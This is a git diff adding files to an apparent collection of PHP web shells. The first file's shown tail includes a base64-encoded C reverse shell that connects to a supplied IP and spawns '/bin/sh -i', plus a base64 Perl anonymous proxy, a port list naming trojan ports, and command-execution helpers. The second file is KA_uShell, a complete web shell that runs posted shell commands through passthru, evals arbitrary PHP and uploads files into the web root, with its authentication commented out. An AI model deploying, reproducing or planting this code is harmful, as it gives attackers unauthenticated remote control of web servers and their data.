+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîðåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïðåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêðûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>   ".$fil."   </b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "
\ No newline at end of file
diff --git a/xakep-shells/PHP/KA_uShell.php.php.txt b/xakep-shells/PHP/KA_uShell.php.php.txt
new file mode 100644
index 0000000..933de04
--- /dev/null
+++ b/xakep-shells/PHP/KA_uShell.php.php.txt
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
